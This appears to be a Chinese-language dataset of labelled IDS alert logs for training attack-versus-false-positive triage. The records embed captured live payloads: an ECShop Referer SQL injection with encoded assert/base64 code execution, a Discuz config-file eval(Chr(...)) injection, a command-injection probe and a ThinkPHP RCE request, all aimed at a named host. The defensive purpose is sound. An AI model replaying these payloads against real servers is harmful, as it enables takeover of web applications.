"branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "45.64.52.160", "dimension": "3", "url_path": "/user.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "user.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /user.php?act=login HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569449-SQL注入攻击(机器学习)", "rule_labels": "{}", "sport": "59279", "h_url": "/user.php?act=login"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673409", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732673409, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/user.php?act=login", "dport": 80, "vuln_name": "SQL注入攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2020-11-25 19:52:52", "sport": 65228}, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "42dabbc0105eb5e97b59d9e914fe4a74", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/user.php", "first_access_time": "2024-11-27 10:10:09", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "f5713ea2cac1dbcda68d89e4071b4d63", "xff": "", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673389", "code_language": "", "public_date": "2020-11-25 19:52:52", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/user.php?act=login", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b69", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", "referer": "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}554fcae493e564ee0dc75bdf2ebf94ca", "vlan_id": "", "vuln_type": "SQL注入攻击(机器学习)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "act": "login", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC91c2VyLnBocD9hY3Q9bG9naW4gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpSZWZlcmVyOiA1NTRmY2FlNDkzZTU2NGVlMGRjNzViZGYyZWJmOTRjYWFkc3xhOjI6e3M6MzoibnVtIjtzOjYxNzoiKi9TRUxFQ1QgMSwweDJkMzEyNzIwNTU0ZTQ5NGY0ZTJmMmEsMiw0LDUsNiw3LDgsMHg3YjI0NjE3MzY0Mjc1ZDNiNjE3MzczNjU3Mjc0Mjg2MjYxNzM2NTM2MzQ1ZjY0NjU2MzZmNjQ2NTI4Mjc1YTZkNmM3MzVhNTYzOTc3NjQ1ODUyNjY1OTMyMzk3NTY0NDc1Njc1NjQ0ODRkNmY0YTMyNTYzMjY0NmQ0NjczNGM2ZTQyNmY2MzQzNjM3MzRhN2E3NzJmNjM0NzY4Nzc0OTQ3NGU3MzU5NTg0ZTdhNDk0NTY0Njg1NDU0NDU3NzVhNmI0NTMxNDk0ODczNjc2MzQ4NTY2OTYyNDc2YzZhNDk0NzVhMzE2MjZkNGUzMDYxNTczOTc1NDk0NjM5NjY1OTMyMzk3NTYzMzM1Mjc5NjQ1NzRlMzA0YjQzNTI0OTRlMzIzMTMxNGU2OTZjMzc0OTQ1NDI2YzY0NmQ0NjczNGI0MzQ5NzY0YjZjNzA0ODRlNTg3MDcyNjI2YzRhNmQ1NTMyNzM3MTRjNzk0OTc1NGE0NTY3MzM2MjU4NTUzMjRjNjk0OTY5NGI1NDczNjc2NjU4MzE3NTVhNTg2MzY3NTIzMjQ2NGU0ZDU0NDI2ZDUxNTQ1NTZmNGE0NjM5NTM1MjU2NDY1NjUyNTY0ZTU1NTc3YTQ1Nzk0ZDMxMzA3MDRmN2EzODJiNGQ0NDU2Njg0ZDU0NDY2YjRlNmE1NTc4NTk2ZDRkNzg1YTU0NTUzMjRlNmQ0ZDMwNWE1MzYzNzAyNzI5MjkzYjJmMmY3ZDc4Nzg3OCwxMC0tIC0iO3M6MjoiaWQiO3M6MTE6Ii0xJyBVTklPTi8qIjt9NTU0ZmNhZTQ5M2U1NjRlZTBkYzc1YmRmMmViZjk0Y2ENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjEpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_87af1125647c4a1949bb3a12e1048bef", "access_time": "2024-11-27 10:10:09", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "45.64.52.160", "dimension": "3", "url_path": "/user.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "user.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /user.php?act=login HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:617:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325632646d46734c6e426f634363734a7a772f6347687749474e7359584e7a49456468545445775a6b4531494873676348566962476c6a49475a31626d4e306157397549463966593239756333527964574e304b4352494e3231314e696c374945426c646d46734b4349764b6c70484e587072626c4a6d553273714c7949754a456733625855324c6949694b547367665831755a5863675232464e4d54426d5154556f4a4639535256465652564e55577a45794d3130704f7a382b4d4456684d54466b4e6a5578596d4d785a5455324e6d4d305a5363702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}554fcae493e564ee0dc75bdf2ebf94ca\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569449-SQL注入攻击(机器学习)", "rule_labels": "{}", "sport": "65228", "h_url": "/user.php?act=login"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673393", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732673393, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 18, "uri": "/utility/convert/data/config.inc.php", "dport": 80, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 0, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 53448}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "file_md5": "2fd9419e43731bf51d68405f5ededb25", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/utility/convert/data/config.inc.php", "first_access_time": "2024-11-27 10:09:53", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "a5607836cd0899e92c3ff1aa6e06fc37", "xff": "", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673372", "code_language": "其他", "public_date": "2018-04-03 17:04:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "18", "h_proto_version": "HTTP/1.1", "uri": "/utility/convert/data/config.inc.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001384", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", "referer": "http://www.hn.sgcc.cn/utility/convert/data/config.inc.php", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdXRpbGl0eS9jb252ZXJ0L2RhdGEvY29uZmlnLmluYy5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiB6aC1jbg0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL3V0aWxpdHkvY29udmVydC9kYXRhL2NvbmZpZy5pbmMucGhwDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xKQ0KQ29udGVudC1MZW5ndGg6IDE5DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "dG9tPWVjaG8gbWQ1KCdscycpOw==", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_12cefefe5e26689c2bab4b1ab7e3d21a", "access_time": "2024-11-27 10:09:53", "content-length": "19", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/utility/convert/data/config.inc.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "config.inc.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /utility/convert/data/config.inc.php HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/utility/convert/data/config.inc.php\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nContent-Length: 19\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "tom=echo md5('ls');", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "sport": "53448", "h_url": "/utility/convert/data/config.inc.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673377", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732673377, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "通用", "hit_end": 0, "uri": "/utility/convert/index.php?a=config&source=d7.2_x2.0", "dport": 80, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "45.64.52.160", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 55769}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/utility/convert/index.php", "first_access_time": "2024-11-27 10:09:37", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "6bcf11bf5b8af7f33daf847919529556", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673357", "code_language": "PHP", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "a": "config", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/utility/convert/index.php?a=config&source=d7.2_x2.0", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", "referer": "http://www.hn.sgcc.cn/utility/convert/index.php?a=config&source=d7.2_x2.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "source": "d7.2_x2.0", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdXRpbGl0eS9jb252ZXJ0L2luZGV4LnBocD9hPWNvbmZpZyZzb3VyY2U9ZDcuMl94Mi4wIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NClJlZmVyZXI6IGh0dHA6Ly93d3cuaG4uc2djYy5jbi91dGlsaXR5L2NvbnZlcnQvaW5kZXgucGhwP2E9Y29uZmlnJnNvdXJjZT1kNy4yX3gyLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjEpDQpDb250ZW50LUxlbmd0aDogOTQ4DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "YT1jb25maWcmc291cmNlPWQ3LjJfeDIuMCZzdWJtaXQ9eWVzJm5ld2NvbmZpZyU1YnRhcmdldCU1ZCU1YmRiaG9zdCU1ZD1sb2NhbGhvc3QmbmV3Y29uZmlnJTViYWFhJTBkJTBhJTBkJTBhZXZhbChDaHIoMTAxJTI5LkNociUyODExOCUyOS5DaHIlMjg5NyUyOS5DaHIlMjgxMDglMjkuQ2hyJTI4NDAlMjkuQ2hyJTI4MzQlMjkuQ2hyJTI4MzYlMjkuQ2hyJTI4OTUlMjkuQ2hyJTI4ODAlMjkuQ2hyJTI4NzklMjkuQ2hyJTI4ODMlMjkuQ2hyJTI4ODQlMjkuQ2hyJTI4OTElMjkuQ2hyJTI4MTE2JTI5LkNociUyODExMSUyOS5DaHIlMjgxMDklMjkuQ2hyJTI4OTMlMjkuQ2hyJTI4NTklMjkuQ2hyJTI4MzQlMjkuQ2hyJTI4NDElMjkuQ2hyJTI4NTklMjklMjklM2IlMmYlMmYlNWQ9bG9jYWxob3N0Jm5ld2NvbmZpZyU1YnNvdXJjZSU1ZCU1YmRidXNlciU1ZD1yb290Jm5ld2NvbmZpZyU1YnNvdXJjZSU1ZCU1YmRicHclNWQ9Jm5ld2NvbmZpZyU1YnNvdXJjZSU1ZCU1YmRibmFtZSU1ZD1kaXNjdXombmV3Y29uZmlnJTVic291cmNlJTVkJTVidGFibGVwcmUlNWQ9Y2RiXyZuZXdjb25maWclNWJzb3VyY2UlNWQlNWJkYmNoYXJzZXQlNWQ9Jm5ld2NvbmZpZyU1YnNvdXJjZSU1ZCU1YnBjb25uZWN0JTVkPTEmbmV3Y29uZmlnJTVidGFyZ2V0JTVkJTViZGJob3N0JTVkPWxvY2FsaG9zdCZuZXdjb25maWclNWJ0YXJnZXQlNWQlNWJkYnVzZXIlNWQ9cm9vdCZuZXdjb25maWclNWJ0YXJnZXQlNWQlNWJkYnB3JTVkPSZuZXdjb25maWclNWJ0YXJnZXQlNWQlNWJkYm5hbWUlNWQ9ZGlzY3V6eCZuZXdjb25maWclNWJ0YXJnZXQlNWQlNWJ0YWJsZXByZSU1ZD1wcmVfJm5ld2NvbmZpZyU1YnRhcmdldCU1ZCU1YmRiY2hhcnNldCU1ZD0mbmV3Y29uZmlnJTVidGFyZ2V0JTVkJTVicGNvbm5lY3QlNWQ9MSZzdWJtaXQ9JWIxJWEzJWI0JWU2JWI3JWZlJWNlJWYxJWM2JWY3JWM5JWU4JWQ2JWMz", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_7315c8d3e59d7592251691df7ed0718f", "access_time": "2024-11-27 10:09:37", "content-length": "948", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16030000", "submit": "%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/utility/convert/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hn.sgcc.cn/utility/convert/index.php?a=config&source=d7.2_x2.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nContent-Length: 948\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "55769", "h_url": "/utility/convert/index.php?a=config&source=d7.2_x2.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673357", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732673357, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.55", "site_app": "", "hit_end": 0, "uri": "/index.php?s=captcha", "dport": 80, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "45.64.52.160", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 51916}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hn.sgcc.cn/index.php", "first_access_time": "2024-11-27 10:09:17", "hazard_level": "6", "cookie": "PHPSESSID=gnigjmkjbyicjygcilvaurc", "method": "GET", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.31.193.55", "_method": "__construct", "skyeye_index": "", "sip_ioc_dip": "0c29fd7ce7452851667eb4d17582e383", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732673337", "code_language": "", "public_date": "2020-11-25 19:51:41", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": 